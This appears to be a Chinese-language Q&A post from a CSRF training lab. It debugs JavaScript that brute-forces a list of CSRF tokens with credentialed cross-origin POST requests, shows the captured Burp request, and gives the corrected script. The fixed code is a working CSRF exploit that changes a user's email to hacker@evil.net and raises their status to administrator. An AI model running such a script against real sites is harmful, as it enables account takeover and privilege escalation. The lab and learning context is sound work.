我正在CSRF实验室工作,并尝试遍历20多个令牌。
<script>
// Candidate csrf values; the outer loop sends one request per entry.
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
// NOTE: a function declaration inside a for-block relies on sloppy-mode hoisting rules;
// a function expression assigned to a variable would be the conventional form.
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
// Attach the browser's stored cookies to the cross-origin request (the captured request
// below carries a PHPSESSID cookie and "Origin: null"). Defensively, a SameSite attribute
// on the session cookie, or a server-side check that the Origin header matches the site,
// would keep such a request from being accepted regardless of the csrf value.
xhr.withCredentials = true;
// BUG: `i` here is NOT the outer loop counter. The `var i` of the inner loop below is
// hoisted to the top of submitRequest and is still undefined at this point, so
// token[i] evaluates to token[undefined] and the body carries the literal string
// "undefined" — exactly what the captured request shows (csrf=undefined).
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
// The inner loop reuses the name `i`, shadowing the outer counter; a different name
// (e.g. j) fixes the request body. One byte per UTF-16 code unit is only correct because
// the body string is pure ASCII.
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
// Content-Type was set explicitly above, so the Blob's own (empty) type is not used.
xhr.send(new Blob([aBody]));
}
// Equivalent to submitRequest(); `.call()` with no arguments adds nothing here.
submitRequest.call();
};
</script>
我用 `+ token[i] +` 把令牌拼接到 csrf 参数里，但在 Burp 中查看请求时，该值显示为 undefined（未定义）:
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
我哪里做错了？我还是 JavaScript 新手，所以 `+ token[i] +` 也许不是实现这一点的正确方法？
您把 i 定义了两次（内层循环的 var i 遮蔽了外层循环的 i，导致 token[i] 读到 undefined）。可以改用 let 声明，或者给内层循环换一个变量名:
// Candidate csrf values; the outer loop sends one request per entry.
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
// NOTE: a function declaration inside a for-block relies on sloppy-mode hoisting rules;
// a function expression assigned to a variable would be the conventional form.
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
// Attach the browser's stored cookies to the cross-origin request. Defensively, a SameSite
// attribute on the session cookie, or a server-side check of the Origin header, would keep
// such a request from being accepted regardless of the csrf value.
xhr.withCredentials = true;
// submitRequest no longer declares its own `i`, so this lookup reaches the enclosing
// scope and reads the outer loop counter; because the call below is synchronous,
// it sees the current iteration's value.
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
// Fix: the byte-copy loop uses `j`, so it no longer shadows the outer `i`.
// One byte per UTF-16 code unit is only correct because the body string is pure ASCII.
for (var j = 0; j < aBody.length; j++)
aBody[j] = body.charCodeAt(j);
// Content-Type was set explicitly above, so the Blob's own (empty) type is not used.
xhr.send(new Blob([aBody]));
}
// Equivalent to submitRequest(); `.call()` with no arguments adds nothing here.
submitRequest.call();
};